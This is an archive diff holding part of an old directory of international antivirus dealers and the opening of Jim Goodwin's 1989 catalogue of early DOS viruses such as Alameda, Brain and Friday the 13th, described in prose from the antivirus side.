(1) 615 445 +Fax: +353 (1) 615 323 +BBS: +353 (1) 288-5634 + +353 (1) 283-1908 [U.S. 
Robotics HST] + +ISRAEL +Chief Data Recovery Company +Address: 15 Ha'banim Street + PO Box 499 + Nes-Ziona 70400 +Contact: Nemrod Kedem +Telephone: +972 (8) 400 070 +Fax: +972 (8) 403 295 +BBS: +972 (3) 966 7562 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3919 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3499 [v.32bis/v.42bis/14400bps] + +972 (3) 967 3256 [MNP5/2400bps] + + +ITALY +Ultimobyte Editrice, SRL +Address: Via A. Manuzio, 15 + 20124 Milano +Contact: Adalberto Fontana +Telephone: +39 (2) 655-5306 +Fax: +39 (2) 65.55.061 + +JAMAICA +W.T.G APTEC Systems Ltd. +Address: "The Towers" + 25 Dominca Drive + Kingston 5 +Contact: Arnold McDonald +Telephone: (809) 929-9250 +Fax: (809) 929-8296 + +JAPAN +LINK Co., Ltd. +Address: Rosebud Gotanda Bldg 10F + 8-8-15 Nishi-Gotanda + Shingawa-ku + Tokyo 141 +Contact: Akira Watanabe +Telephone: +81 (3) 3493 5850 +Fax: +81 (3) 3493 5188 + +KOREA +Myung-Je Corporation +Address: Insung Bldg. + 266-8 Yangjae-Dong, Seocho-Ku + Seoul, 137-130 +Contact: Park Dong Myung +Telephone: +82 (2) 575-5770 +Fax: +82 (2) 579-3817 + +KUWAIT +Sultan Systems +Address: Salem Mubarak Street + Bldg. 17, Block 49, 5th Floor + Safat 13132 +Contact: Mohanned Hassanin +Telephone: +965 572 3153 + +965 572 3155 +Fax: +965 572 3152 + +MALAYSIA +MCSB Systems (M) Sdn Bhd +Address: Ground Floor, Wisma Mirama + Jalan Wisma Putra + 50460 Kuala Lumpur +Contact: Mr. Mok Fork Chuan +Telephone: +60 (3) 241 7400 +Fax: +60 (3) 248 8010 + +MAURITIUS +J. Kalachand & Co. Ltd. +Address: 20 A&B Lord Kitcheter Street + Port-Louis +Contact: Ramesh Kalachand +Telephone: +230 212-6313 +Fax: +230 208-8244 + +MEXICO +Ingenieria y Technologia Avanzada, S.A. de C.V. +Address: Vanegas #212 + Col. Mitras Centro + Monterrey, Nuevo Leon, 64460 +Contact: Raul Quintanilla, Director +Telephone: +52 (083) 46 9865 +Fax: +52 (083) 46 9865 +BBS: +52 (83)58 1477 [1200/2400 bps] + +52 (83)59 9848 [1200/2400 bps] + +52 (83)59 9849 [1200/2400 bps] + +MEXICO +McAfee Associates, Mexico, S.A. de C.V. 
+Address: Ave. Nuevo Leon No.253, Desp. 501 + Col. Escandon, C.P. 11800, Mexico D.F. +Contact: Arturo De la Mora Carrasco + Felipe Lopez Gomez + Patricia De la Mora +Telephone: +52 (5) 273-1361 + +52 (5) 273-0954 +Fax: +52 (5) 273-1019 +BBS: +52 (5) 590-5988 [1200-9600 bps] + +MEXICO +Mundo PC, S.A. +Address: Rio San Lorenzo No. 507-A OTE + Garza Garcia, N.L. 66220 +Contact: Bill Schaefer +Telephone: +52 (8) 378-34-48 + +NETHERLANDS, THE +CPU Communications & Products United C.V. + SALES OFFICE +Address: Jacob van Maerlandstraat 86-90 + 5216 JM 's Hertogenbosch + PO Box 1878 + 5200 BW 's Hertogenbosch +Contact: Rick Wezenaar +Telephone: +31 (73) 141252 +Fax: +31 (73) 140437 +BBS: +31 (73) 124674 [14,400bps] + +31 (73) 130204 [2400 bps] + SUPPORT OFFICE +Address: Verzamlegebouw Zuid + Strevelsweg 700/302 + 3083 AS Rotterdam + PO Box 5011 + 3008 AA Rotterdam +Contact: Fred Janssen or Fred de Koning +Telephone: +31 (10) 4102233 +Fax: +31 (10) 4808555 +BBS: +31 (10) 4103188 [14,400bps] + +31 (10) 4103022 [2400bps] + +NETHERLANDS ANTILLES +Micro Computer Consultants +Address: Fokkerweg 30 + Muskus Building + Willemstad Curaco +Contact: Edison Maduro +Telephone: +599 (9) 61 31 61 +Fax: +599 (9) 61 61 19 + +NEW ZEALAND +Computer Software Library of NZ, Ltd. +Address: WaiPoPo 3 R.D. + Timaru +Contact: Bill Strauss +Telephone: +64 (3) 615-9333 +Fax: +64 (3) 615-9333 +BBS: +64 (3) 615-9313 +Mobile Phone +64 (25) 32-8443 + +NORWAY +COMMA +Address: P.O. Box 6448 Etterstad + 0605 Oslo +Contact: Frode Jonsrud +Telephone: +47 (2) 627500 +Fax: +47 (2) 627501 + +PHILIPPINES +Mannasoft Technology Corporation +Address: Suite 105 Mid-Land Mansion + 839 Pasay Road, Makati + Metro Manilla +Contact: Hans C. Dee +Telephone: +63 (2) 87 63 19 + +63 (2) 813-41-62 + +63 (2) 813-41-63 +Pager Service:+63 (2) 869 11 11 +FAX: +63 (2) 812 93-10 + +PORTUGAL +Fobis, Informatic e Gestao, Lda. 
+Address: Praca de Londres 3-1.Dt + P-1000 Lisboa +Contact: Nuno Pinto +Telephone: +351 (1) 848 31 84 +Fax: +351 (1) 848 17 77 + +SAUDI ARABIA +Gulf Stars Computer Systems +Address: PO Box 52908 + Riyadh 11573 +Contact: Anwar Qahwash +Telephone: +966 (1) 432-8222 +Fax: +966 (1) 465-3156 +Telex: 407602 GSCS SJ + +SINGAPORE +Asiasoft (S) PTE. LTD. +Address: No. 8, Aljunied Avenue 3, Oakwell Bldg. + Singapore 1438 +Contact: Lai Lee Tat +Telephone: +65 742 6000 +Fax: +65 742 7000 +BBS: +65 741 8707 + +SINGAPORE +Computerware for Micros +Address: Block 165, Bukit Merah Central + #05-3683 + Singapore 0315 +Contact: Eddie C.K. Teo +Telephone: +65 271-6001 +Fax: +65 271-6003 +Pager: +65 204-2319 +BBS: +65 448-3395 + +SINGAPORE +MCSB Systems (S) Pte Ltd +Address: 5 Little Road + #05-01 Cemtex Industrial Building + Singapore 1953 +Contact: Ivan Wainewright +Telephone: +65 382-7600 +Fax: +65 382-5700 + +SLOVAKIA +NKOP elektronik Ltd. +Address: Coboriho 2 + 949 01 NITRA +Contact: Peter Zoldos +Telephone: +42 (87) 419 780 +Fax: +42 (87) 413 958 + +SOUTH AFRICA +Dynamic Solutions +Address: P.O. Box 4397 + Cape Town 8000 +Contact: Oliver Steudler +Telephone: +27 (21) 24 9504 +Fax: +27 (21) 26 1911 +BBS: +27 (21) 24 2208 [1200-14,400 bps U.S. Robotics HST/v.32/v.42bis] +CompuServe: 100075,200 +Fidonet: 5:7102/110 +Internet: Oliver.Steudler@f110.n7102.z5.fidonet.ORG + or 100075.0200@compuserve.COM +Beltel: 608780 + +SOUTH AFRICA +International Data Security (Pty) Ltd. +Address: Shop 10 + 191 Chapel Street + Pietermaritzburg + Natal 3201 +Contact: Gavin Nesbitt +Telephone: +27 (331) 427 134 +Fax: +27 (331) 427 135 +BBS: +27 (331) 455 710 [300-14,400 bps U.S. 
Courier v.32/v.42bis] + +SPAIN +DATAMON, SA Central +Address: Corcega, 485 + 08025 Barcelona +Contact: Carmen Mestres +Telephone: +34 (3) 207-2704 +Fax: +34 (3) 457-1370 + +SPAIN +DATAMON, SA - Macroservice +Address: C/Infanta Mercedes, 83 + 28020 Madrid +Contact: Diego Saez +Telephone: +34 (1) 571 52 00 +Fax: +34 (1) 571 19 11 + +SWEDEN +Virus Help Centre - MAIN Office +Address: Box 7018 + S 811 07 Sandviken +Contact: Mikael Larsson +Telephone: +46 (26) 100518 +Direct Phone: +46 (26) 275740 +Mobile Phone: +46 (10) 295 5551 +Fax: +46 (26) 275720 +BBS: +46 (26) 275710 [U.S. Robotics Dual Standard] + +46 (26) 275715 [U.S. Robotics HST] +Fidonet: 2:205/204 or 2:205/234 +VirNet: 9:461/101 or 9:461/111 +Internet: mikael@abacus.hgs.se + +Virus Help Centre - GAVLE Office +Address: Box 1237 + S 801 37 Gavle +Contact: Ola Larsson +Mobile Phone: +46 (10) 295-5552 +Fidonet: 2:205/212 +VirNet: 9:461/112 +Internet: ola@abacus.hgs.se + +SWITZERLAND +DASIKON AG (formerly Computer Concepts Marcus Laeubli) +Address: Sandbueelstrasse 6 + P.O. Box 2101 + CH-8604 Volketswil +Contact: Marcel Riwar +Telephone: +41 (1) 945-5970 +Fax: +41 (1) 946-0545 +BBS: +41 (1) 945-5077 + +TRINIDAD & TOBAGO +Opus Networx +Address: P.O. Box 972 + Port of Spain, Trinidad & Tobago + West Indies +Contact: Peter Wimbourne +Tel: (809) 625-5946 +Fax: (809) 625-5950 +BBS: (809) 625-5077 + +TURKEY +MBS Bilgisayar Hiz.ve Tic.Ltd.Sti. +Address: Buyukdere Cad. No. 4/7 + Sisli - Istanbul +Contact: Cem Celik +Telephone: +90 (1) 231-8008 +Fax: +90 (1) 240-3664 + +UNITED KINGDOM +International Data Security +Address: 9 & 10 Alfred Place + London WC1E 7EB +Contact: Oliver Mills +Telephone: +44 (71) 631 0548 + +44 (71) 436 2244 +Fax: +44 (71) 580 1466 +BBS: +44 (71) 580 4800 + +URUGUAY +Datamatic +Address: 25 de Mayo 635 Piso 6 + Montevideo 11100 +Contact: Ivonne Chabaneau + Juan Camps (technical) +Telephone: +598 2 96 18 42 +Fax: +598 2 96 27 71 + +VENEZUELA + +Lantech Ltd. +Address: Edit. La linea, Ave. 
Libertador + Torre A - Piso 15 + Caracas +Contact: Vladimir Castillo +Telephone: +582 781 4655 +Fax: +582 781 7454 + +ZAMBIA +KBM Software Plaza +Address: P.O. Box 320139 + Woodlands + Lusaka +Contact: (Mrs.) Kasonde B. Shakalima +Telephone: +260 (1) 260 151 +Fax: +260 (1) 260 196 + +UNITED STATES +Advanced Computer Networks +Address: 260 Old Nyack Turnpike + Spring Valley, NY 10977 +Contact: Lazer Milstein, CNE or + David Adams +Telephone: (914) 425-5858 +Telephone: (800) 383-0257 Order inquriry +Fax: (914) 425-4306 +BBS: (914) 425-2304 [300-14,400 bps U.S. Robotics HST/v.32/v.42bis] + +UNITED STATES +Advanced Computer Technologies +Address: 108 Main Street + Norwalk, CT 06851 +Contact: Larry McNally +Telephone: (203) 847-9433 +Fax: (203) 847-2475 + +UNITED STATES - Pacific Northwest +Al Mashburn & Associates +Address: 7406 - 27th Street West, Suite 8 + Tacoma, WA 98466 +Contact: Al Mashburn +Telephone: (206) 565-8641 +Fax: (206) 565-3134 + +UNITED STATES +Automated Business Concepts +Address: 1005 Farmington Rd. + Pensacola, FL 32504-7037 +Contact: Bill Miller +Telephone: (904) 474-1575 +Fax: (904) 474-1589 + +UNITED STATES +Barish & O'Brien Consulting +Address: 19 West 44th Street, Suite 300 + New York, NY 10036 +Contact: David Barish +Telephone: (212) 221-1600 +Fax: (212) 221-1658 + +UNITED STATES - New England +Beehive Computer Company +Address: #2 Industrial Park Drive + Concord, NH 03301 +Contact: Jeff Parkerson +Telephone: (603) 226-2993 +Fax: (603) 226-2070 + +UNITED STATES - Midwest +Blue Chip Computer Company +Address: 3085 Woodman Drive + Dayton, OH 45420 +Contact: Jim King +Telephone: (513) 299-4594 +Fax: (513) 298-5798 + +UNITED STATES - Northern California +C&P Solutions +Address: 14428 Union Avenue + San Jose, CA 95124 +Contact: Luis Paz +Telephone: (408) 559-4049 +Fax: (408) 559-8645 + +UNITED STATES +CDT, Inc. 
+Address: 3110 Rhapsody Court + Colorado Springs, CO 80920 +Contact: Glen Sandusky +Telephone: (719) 260-0567 +Fax: (719) 531-5256 + +UNITED STATES +CompuNet, Inc. +Address: 8080 Madison Avenue, Suite 202 + Fair Oaks, CA 95286 +Contact: Noel Morgan +Telephone: (916) 965-3112 +Fax: (916) 965-5713 + +UNITED STATES +ComputerLand of Sioux Falls, SD +Address: 3809 South Western Avenue + Sioux Falls, SD 57105 +Contact: Eric Hosen +Telephone: (605) 338-5263 +Fax: (605) 338-7130 + +UNITED STATES +The Computer Station +Address: 2600 South King Street, Suite 207 + Honolulu, HI 96826 +Telephone: (808) 942-7747 +Fax: (808) 942-5119 +BBS: (808) 247-7328 + +UNITED STATES - South +Computer Generations, Inc. +Address: P.O. Box 71 + Hendersonville, TN 37077-0071 +Contact: Cliff Jones +Telephone: (615) 865-1418 +Fax: ? + +UNITED STATES - Midwest +Computer Maintenence, Inc. +Address: 1433 Fullerton Avenue, Suite M + Addison, IL 60101 +Contact: Dan Eremenchuk +Telephone: (708) 953-1555 +Fax: (708) 953-1441 + +UNITED STATES - South +Computer Security Plus, Inc. +Address: 3900 South Tampa Avenue + Orlando, FL 32809 +Contact: Padgett Peterson +Telephone: (407) 352-6027 +Fax: (407) 352-6027 +BBS: (407) 352-6027 +Internet: padgett%tccslr.dnet@mmc.com + +UNITED STATES - South +Computers For Business +Address: 2843 Pembroke Road + Hollywood, FL 33020 +Contact: David Bennett +Telephone: (305) 920-9604 +Fax: (305) 921-6131 + +UNITED STATES +Computer Technology Associates +Address: 1901 E 37th Street, Suite 202 + Odessa, TX 79762 +Contact: John Minor +Telephone: (915) 368-5208 +Fax: (915) 368-4108 + +UNITED STATES - Southern California +Creative Business Concepts, Inc. 
+Address: 25231 Paseo de Alicia + Laguna Hills, CA 92653 +Contact: Rick Shafer +Telephone: (714) 855-9445 +Fax: (714) 855-0532 + +UNITED STATES - South +Crystal Data Systems +Address: 2104 West Ferry Way + Huntsville, AL 35801 +Contact: Doug West +Telephone: (205) 883-4233 +Fax: (205) 883-4293 + +UNITED STATES +DataLan Corporation +Address: 50 Main Street, Suite 1000 + White Plains, NY 10606 +Contact: John Arnold +Telephone: (914) 682-2022 +Fax: (914) 682-2123 + +UNITED STATES +DataTek Computer Services +Address: 547 Wunder Street + Reading, PA 19602-2005 +Contact: Kirk Wentzel +Telephone: (215) 374-2097 +BBS: (215) 374-3735 + +UNITED STATES - South +Data Integrity +Address: 5301 North Federal Highway, Suite 130 + Boca Raton, FL 33487 +Contact: Neil Kutchera +Telephone: (407) 998-7540 +Fax: (407) 998-7587 + +UNITED STATES - Southern California +FOCAL +Address: 15500 Erwin Street, Suite 2002 + Van Nuys, CA 91411 +Telephone: (818) 376-6598 +Fax: (818) 376-6594 + +UNITED STATES +Genoa Group +Address: 7334 South Alton Way, Unit H + Englewood, CO 80112 +Contact: William L Ross +Telephone: (303) 770-5747 +Fax: (303) 742-2449 + +UNITED STATES - Northern California +GW Associates +Address: 149 Forest Side Avenue + San Francisco, CA 94217 +Contact: George Wertheim +Telephone: (415) 661-0968 + (510) 577-3528 +Fax: ? + +UNITED STATES +Hornbeck's +Address: 406 Walnut Street + Red Bluff, CA 96080 +Contact: Kevin Evenson +Telephone: (916) 527-1201 +Fax: (916) 529-3621 + +UNITED STATES - Midwest +Inacomp-Decatur, IL +Address: 1690 Houston Drive + Decatur, IL 62526 +Contact: Marshall Sperry +Telephone: (217) 875-7611 +Fax: (217) 875-7611 + +UNITED STATES - East +Innovative Business Solutions +Address: 222 W Grand Avenue + Montvale, NJ 07645 +Contact: Richard Verlaque +Telephone: (201) 391-0200 +Fax (201) 291-9803 + +UNITED STATES - New York +International Security Technology Inc. +Address: 99 Park Avenue - 11th Floor US Re + New York, NY 10022 +Contact: Robert V. 
Jacobson +Telephone: (212) 557-0900 +Fax: (212) 808-5206 + +UNITED STATES - Great Lakes States +James C. Shaeffer and Associates + +Detroit Office: +Address: 5025 Venture Drive + Ann Arbor, MI 48108 +Contact: James C. Shaeffer +Telephone: (800) 968-9527 +Fax: (313) 741-9528 +Mobile: (313) 670-7354 (If no answer, please leave name and number) +cc:Mail: (313) 741-9533 Name: James C. Shaeffer, PO: JCS_PO +BBS: (313) 741-9529 [PPI 14,400bps v.32/v.42bis 8N1 line settings] + +Chicago Office: +Address: 744 Fox Hunt Trail + Deerfield, IL 60015 +Contact: David Shook +Telephone: (312) 399-9364 +Fax: (313) 741-9528 +cc:Mail: (313) 741-9533 Name: David C. Shook, PO: JCS_PO +BBS: (313) 741-9529 [PPI 14,400bps v.32/v.42bis 8N1 line settings] + +UNITED STATES - East +Jetics Inc. +Address: 8229 Boone Blvd. Suite 860 + Vienna, VA 22182 +Contact: Wayne Carpenter +Telephone: (703) 893-4404 +Fax: (703) 821-0710 + +UNITED STATES +Joseph Head Cooper Consulting +Address: 321 West Craig Place + San Antonio, TX 78212 +Contact: Joe Cooper +Telephone: (512) 736-2383 + +UNITED STATES +Juniper Systems, Inc. +Address: 2 Newton Executive Park + Newton Lower Falls, MA 02162-1434 +Contact: Stu Tischler +Telephone: (617) 965-2525 +Fax: (617) 965-4950 + +UNITED STATES +Kortek Industries +Address: 2000 Bering Drive, Suite 400 + Houston, TX 77057 +Contact: John Heaney +Telephone: (713) 783-0024 +Fax: (713) 783-7649 + +UNITED STATES +M.S. 
Business Center +Address: 6161 El Cajon Blvd., Suite B-15 + San Diego, CA 92115 +Telephone: (619) 583-4960 +Fax: (619) 583-9375 + +UNITED STATES +Micro Networks of America +Address: 320 Main Street + Farmington, CT 06034 +Contact: Paul Dandrow +Telephone: (203) 678-7400 +Fax: (203) 678-9437 + +UNITED STATES - Northern California +Microplus Systems Technologies +Address: 1020 East El Camino Real + Sunnyvale, CA 94087 +Contact: Ralph Manildi or Bui Han +Telephone: (408) 737-2525 +Fax: (408) 737-2402 + +UNITED STATES - South +Micro Tech Systems +Address: 701 East Bay Street + Box 1313 + Charleston, SC 29403 +Contact: Curtis Clark +Telephone: (803) 724-3480 +Fax: (803) 724-3400 + +UNITED STATES - Southeast +Monterey-Waldec, Inc. +Address: 4899 West Waters Avenue + Tampa, FL 33634 +Contact: Andy Swenson +Telephone: (813) 882-9066 +Fax: (813) 882-9910 + +UNITED STATES +NETLAN +Address: 29 West 38th Street + New York, NY 10018 +Contact: Al Berg +Telephone: (212) 768-2273 +Fax: (212) 768-2201 +BBS: (212) 764-3876 + +UNITED STATES +NetPro Computing, Inc. +Address: 8655 East Via de Ventura #E155 + Scottsdale, AZ 85258 +Contact: Corbin Glowacki +Telephone: (602) 998-5008 + (800) 998-5090 +Fax: (602) 998-5076 +BBS: (602) 998-5093 [1200-14,400bps v.32/v.42bis] + + +UNITED STATES +Network Engineering & Comm. +Address: 14718 NE 87th Street + Redmond, WA 98052 +Contact: Dan Kidd +Telephone: (206) 861-1778 +Fax: (206) 891-1704 + +UNITED STATES +NH&A (formerly NHFA) +Address: 577 Isham Street, Suite 2B + New York, NY 10034 +Contact: Norman Hirsch +Telephone: (212) 304-9759 ext. 1 +Fax: (212) 304-9759 +BBS: (212) 304-9759 ext. 
3 + +UNITED STATES - Pacific Northwest +OverFlow Corporation +Address: 8950 SW Burnham Street + Portland, OR 97223-6103 +Contact: Jenice Shaw +Telephone: (503) 598-1871 +Fax: (503) 598-1876 + +UNITED STATES - Northern California +PCS Networks +Address: 5900-T Hollis Street + Emeryville, CA 94608 +Contact: Tim Cuny +Telephone: (510) 655-6500 + (415) 986-1800 +Fax: (510) 655-9298 + +UNITED STATES - Northern California +Peacham Cybernetics +Address: PO Box 70367 + Sunnyvale, CA 94086-0367 +Contact: Fritz Schneider +Telephone: (408) 739-3303 +Fax: (408) 739-3302 +CompuServe: 71043,1117 +Internet: 71043.1117@compuserve.COM + +UNITED STATES - West +Pueblo Group +Address: 6318 E. Calle Cappela + Tucson, AZ 85710 +Contact: Bill Logan +Telephone: (602) 321-2075 +Fax: (602) 881-8474 +BBS: (602) 747-5236 +Internet: blogan@solitud.fidonet.org + +UNITED STATES +Ramcom Technology +Address: PO Box 3491 + Flagstaff, AZ 86003-3491 +Contact: Ron Moore +Telephone: (602) 779-3204 +Fax: (602) 779-3204 +BBS: (602) 779-3265 + +UNITED STATES +Rational Elegance +Address: 14636 NE 42nd Place #N202 + Bellevue, WA 98007-3311 +Contact: Robert Gryphon +Telephone: (206) 885-5499 +Cellular: (206) 940-1124 +Fax: (206) 885-5499 + +UNITED STATES +Sparrow Copmuter Systems, Inc +Address: 616 S. Broad Street + Lansdale, PA 19446 +Contact: Bill Mann +Telephone: (215) 368-9500 +Fax: (215) 368-9522 + +UNITED STATES +SSDS, Inc. +Address: Special Projects & Government Support + PO Box 71827 + Ft. Bragg, NC 28307 +Contact: John H. Kida +Telephone: (703) 827-0806 ext. 204 [24 hour voice mail] +BBS: (919) 867-0754 [1200-14,400 bps, Dual Std. & BIS] +Internet: jhk@washington.ssds.com + +SSDS, Inc. - AUSTIN OFFICE +Address: 3102 Bee Caves Rd, Suite C + Austin, TX 00000-0000 +Contact: Gilbert Silva +Telephone: (512) 329-5731 +Fax: (512) 329-5726 + +SSDS, Inc. - HUNTSVILLE OFFICE +Address: 200 West Coute Square, Suite 988 + Huntsville, AL 35801 +Contact: Matt Petty +Telephone: (205) 534-8383 + +SSDS, Inc. 
- RALIEGH OFFICE (North Carolina) +Address: 3101 Poplarwood Court, Suite 108 + Raliegh, NC 27604 +Contact: John Noss +Telephone: (919) 954-0400 +Fax: (919) 954-0403 + +SSDS, Inc. - WASHINGTON, DC OFFICE +Address: 8150 Leesburg Pike, Suite 1100 + Vienna, VA 22182 +Contact: Patrick Siemon +Telephone: (703) 827-0806 +Fax: (703) 827-0716 + +SSDS, Inc. - CHICAGO OFFICE +Address: 1755 Park Street, Suite 180 + Naperville, IL 60504 +Contact: Mark Kilgore +Telephone: (708) 778-7737 +Fax: (708) 778-7740 + +SSDS, Inc. - SEATTLE OFFICE +Address: 1309 - 114th Ave SE, Suite 104 + Bellevue, WA 98004 +Contact: Brett Burris +Telephone: (206) 453-9141 + +SSDS, Inc. - DENVER OFFICE +Address: 6595 S. Dayton Suite 3000 + Englewood, CO 80111 +Contact: Del Blackketter +Telephone: (303) 790-0660 +Fax: (303) 790-1663 + +UNITED STATES - Eastern Seaboard +Tecnimat/TDS +Address: 180 South Ban Brunt Street + Englewood, NJ 07631 +Contact: Sheree Parke +Telephone: (201) 569-4200 +Fax: (201) 569-2274 + +UNITED STATES +Typetronics Business Systems Inc +Address: 5717 North 7th Street + Phoenix, AZ 85014 +Contact: Roger Smith +Telephone: (602) 274-7253 +Fax: (602) 274-7636 + +UNITED STATES - New England +VacciVirus +Address: 84 Hammond Street + Waltham, MA 02154 +Contact: Roger Aucoin +Telephone: (617) 893-8282 +Fax: (617) 893-3770 + +UNITED STATES +ValCom More than Computers Inc. +Address: 2249 Pinehurst Drive + Middleton, WI 53562 +Contact: Gary Hoffman +Telephone: (608) 836-8180 +Fax: (608) 836-7401 + +UNITED STATES +Wang Laboratories +Address: 7500 Old Georgetown Rd + Bethesda, MD 20814 +Contact: Bill Repine +Telephone: (301) 657-5028 +Fax: (301) 657-5971 + diff --git a/textfiles.com/virus/allvirus.vir b/textfiles.com/virus/allvirus.vir new file mode 100644 index 00000000..14d04806 --- /dev/null +++ b/textfiles.com/virus/allvirus.vir 
@@ -0,0 +1,530 @@ +PC VIRUS LISTING +By Jim Goodwin + This document is copyrighted, 1989, by Jim Goodwin. It + may be freely distributed provided no changes, + additions or deletions are made, and providing this + copyright notice accompanies all copies. I would like + to thank John McAfee and the entire HomeBase users + group for providing the raw materials for this + document. + + + It is difficult to name, identify and classify PC viruses. +Everyone who first discovers a virus will name it and describe +what they think of it. In most cases, the virus is not new and +has been named and described dozens of times before. None of the +names and few of the descriptions will match. While I'm writing +this, for example, I feel certain that someone, somewhere has +just been infected by the Jerusalem virus and they are telling +their co-workers and friends about it as if it were newborn - and +for them perhaps it is. It will be impossible to verify the +strain and variety of the infection, however, unless we can get a +living sample of the virus to analyze and compare with other +strains of this same virus. So problem number one is filtering +the reports of infection and collecting samples that can be +placed under the knife. + Problem number two is - where do you draw the line between +an original virus and a true variation of the virus? The +original Brain virus, for example, could only infect a floppy +diskette. Do the varieties of the Brain that can infect hard +disks (but in every other respect are identical) deserve to be +called new viruses, or are they still the Brain? What about +further modifications that destroy data? Is this now a new +virus? What if someone extracts a segment of the Brain code and +uses it as a basis for a new virus? What if nothing changes but +the imbedded text data, so that the virus is in every way +functionally identical, but the volume label changes to "SMURF" +instead of BRAIN. 
All of these modifications to the Brain have +been discovered and logged. How do we deal with them? + I choose to deal with these modifications in the simplest +way I know. If the virus differs in any way from the original +(assuming that the "original" can in fact be identified), then I +log it as a new strain. This relieves me from having to make +decisions. Those of you who see the world differently can merely +take this listing and lump together all of the different strains +that you like. That way we'll all be happy. + + This will be, by the way, my last virus document. I have +worked double time for the past eighteen months helping John +McAfee and his Homebase folks and, while I have thouroughly +enjoyed myself, I have finally burned out. It has been great fun +and I've learned a lot, and hopefully some of my works, like the +product review with Sankary and Marsh, will end up being somehow +useful to the world. But now I have the irresistible urge to go +fishing, and, perhaps afterwards, to contemplate my navel for a +few years. In-between times I intend to write a book on the +craziness in this industry and about the unique personalities +I've had the pleasure to work with in the Virus Marine Corps. +It's been quite an adventure. Thank you all. + +Jim Goodwin From the Homebase BBS 408 988 4004 + + + + + THE VIRUSES + + I have arranged these viruses so that similar varieties are +described in the sequence in which they appeared within the virus +sub-group (to the best of my knowledge). Not everyone agrees +with my groupings. Many people believe, for instance, that the +Golden Gate-C (Mazatlan Virus) is a distinctly original virus and +is not a variation of the Alameda. I think differently and have +endeavored to show how the Golden Gate evolved from the Alameda, +through each precursor virus. I cannot prove, of course, that +the sequence of appearances is the correct sequence, and in many +cases I have had to guess. 
If anyone wishes to re-order +these virus, I will not be offended. + I have not included any of the specific application trojans +in this list. There has been a lot of discussion about the Lotus +123 and DBASE "viruses", for example. These are not replicating +programs and I do not classify them as viruses. I had originally +intended a separate list to include these non-replicating trojans +but Time caught up with me. + + + +1. ALAMEDA VIRUS + (Also called: Yale; Merritt; Pecking; Seoul) + + This is a boot sector infector. First discovered at Merritt + college in California (1987). Original version caused no + intentional damage. Replicates at boot time -- + and infects only 5 1/4" 360KB floppies. It saves the + real boot sector at track 39, sector 8, head 0. Contains a + count of the number of times it has infected other + diskettes, although it is referenced for write only and is + not used as part of an activation algorithm. The virus + remains resident at all times after it is booted, even if no + floppy is booted and BASIC is loaded. Contains a rare POP + CS instruction that makes it incapable of infecting 286 + systems. + +2. ALAMEDA-B + (Also called Sacramento Virus) + + This is the original Alameda Virus that has the POP CS + removed. Relocation is accomplished through a long jump + instruction. All other characteristics are identical. This + version runs OK on a 286. + +3. ALAMEDA-C + + This is the Alameda-B virus that has been modified to + disable the boot function after 100 infections. The + counter in the original Alameda virus has been re-activated + and is interrogated at each bootup. When it reaches 100 the + virus disconnects from the original boot sector (control is + no longer passed) and the diskette will no longer boot. At + infection time, the counter is zeroed on the host diskette. + +4. SF VIRUS + + This is the Alameda-C that has been modified to format the + boot diskette when the counter runs out. + +5. 
GOLDEN GATE VIRUS + (Also called The 500 Virus) + + This is the SF Virus that has been modified to format the C + drive when the counter runs out. The activation occurs + after 500 infections, instead of 100 infections. Note that + in all three of these strains, the counter is zeroed on the + host diskette at infection time. Thus, the activation + period on this virus will on the average stretch into many + years. No corruption will occur until 500 new diskettes + have been infected from within a given machine. Since the + infection can only occur when the system is booted with a + new diskette, infection is not frequent with this virus. I + expect that the overwhelming majority of infections will + never activate. The IBM PC will have long since been + supplanted by another architecture in most environments. + +6. GOLDEN GATE-B + + This virus is the Golden Gate virus that has had the + activation delay reset to 30 infections. This virus should + activate within a couple of years in most environments. + +7. GOLDEN GATE-C + (Also called the Mazatlan Virus) + + This virus is the Golden Gate virus that is able to infect a + hard disk. It is a nasty virus, since it has more of an + opportunity to do damage than previous versions. Prior + versions were limited since systems with hard disks are only + infrequently booted from floppy and booting from hard disk + overwrote earlier versions. + +8. GOLDEN GATE-D + + This virus is identical to number 7, except the counter has + been disabled (similar to original Alameda). + +9. THE BRAIN + (Also called, Pakistani Brain; Basit Virus) + + This virus originated in January, 1986, in Lahore Pakistan. + It is the only virus yet discovered that includes the valid + names address and phone numbers of the original + perpetrators. The Brain is a boot sector infector, + approximately 3K in length, that infects 5 1/4" floppies. + It cannot infect hard disks. It will infect a diskette + whenever the diskette is referenced. 
For example, a + Directory command, executing a program from the diskette, + copying a file from or to the diskette or any other access + will cause the infection to occur. The virus stores the + original boot sector, and six extension sectors, containing + the main body of the virus, in available sectors which are + then flagged as bad sectors. + + The virus is able to hide from detection by intercepting any + interrupt that might interrogate the boot sector and re- + directing the read to the original boot sector. Thus, + programs like the Norton Utilities will be unable to see the + virus. + + Infected diskettes are noticeable by "@BRAIN" displayed in + the volume label. + +10. BRAIN-B + (Also called Brain-HD; the Hard Disk Brain; Houston Virus) + + This virus is identical in every respect to the original + Brain, with the single exception that it can infect the C + drive. + +11. BRAIN-C + + This virus is the Brain-B that has the volume label code + removed. The volume label of infected diskettes does not + change with this virus. This virus was difficult to detect + since it does nothing overt in the system. + +12. CLONE VIRUS + + This virus is the Brain-C that saves the original boot + copyright label and restores it to the infected boot. The + Basit & Mjad original Brain messages have been replaced with + non-printable garbage that looks like instructions if viewed + through Norton or other utility. Even if the system is + booted from a clean diskette, it is virtually impossible to + tell, by visual inspection, whether the hard disk is + infected. + +13. SHOE_VIRUS + (Also called UIUC Virus) + + This virus is the Brain-B Virus that has been modified to + include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated + to the dynamic memories of millions of virus who are no + longer with us today". The message is never displayed. + +14. SHOE_VIRUS-B + + This is the Shoe_Virus that has been modified to so that it + can no longer infect hard disks. 
The v9.0 has been changed + to v9.1. + +15. ClONE-B + + This is the Clone virus that has been modified to corrupt + the FAT when it is booted after May 5, 1992. There are no + other apparent modifications. + +16. DOS-62 + (Also called the UNESCO Virus) + + This virus is a COM infector. It was first discovered in + Moscow in April, 1988. It was first publicized in August + 1988 when it cropped up at a children's computer Summer camp + run by UNESCO. When a program infected by this virus is + executed, it infects one other COM file in the system. On a + random basis, infected programs will perform a system re- + boot when they are executed. + +17. 62-B + + This virus is similar to DOS-62 except the re-boot is + replaced by deleting the executed program. + +18. FRIDAY THE 13th + (Also called COM Virus; 512 virus) + + This virus is a non-resident COM infector that first + appeared in South Africa in 1987. At each execution of an + infected program the virus seeks out two other COM files on + the 